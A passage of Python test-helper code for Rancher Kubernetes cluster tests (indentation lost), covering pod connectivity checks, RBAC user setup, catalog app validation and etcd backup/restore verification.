ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
